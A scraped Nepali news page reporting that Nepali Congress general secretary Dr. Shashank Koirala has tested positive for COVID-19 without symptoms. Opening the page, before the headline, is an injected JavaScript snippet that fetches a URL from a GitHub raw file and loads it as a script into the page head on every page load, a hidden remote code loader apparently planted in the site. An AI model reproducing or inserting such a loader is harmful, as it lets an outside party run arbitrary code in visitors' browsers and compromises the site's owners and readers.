;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कांग्रेस महामन्त्री डा. शशांक कोइरालालाई कोरोना संक्रमण – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • कांग्रेस महामन्त्री डा. शशांक कोइरालालाई कोरोना संक्रमण
जुनेली बिशेष

कांग्रेस महामन्त्री डा. शशांक कोइरालालाई कोरोना संक्रमण

कोरोना

भदौ २३

काठमाडौं । नेपाली कांग्रेसका महामन्त्री डाक्टर शशांक कोइरालालाई कोरोना संक्रमण पुष्टि भएको छ । मंगलबार नै स्वाब दिएको कोइरालाको रिपोर्ट पोजेटिभ आएको उनको सचिवालयले जनाएको छ ।

कोरोना संक्रमण भए पनि कोइरालामा कुनै लक्षण देखिएको छैन । उनको स्वास्थ्य अवस्था सामान्य रहेको स्वकीय सचिव भरत तिवारीले जानकारी दिए ।

फेसबुक प्रतिक्रियाहरु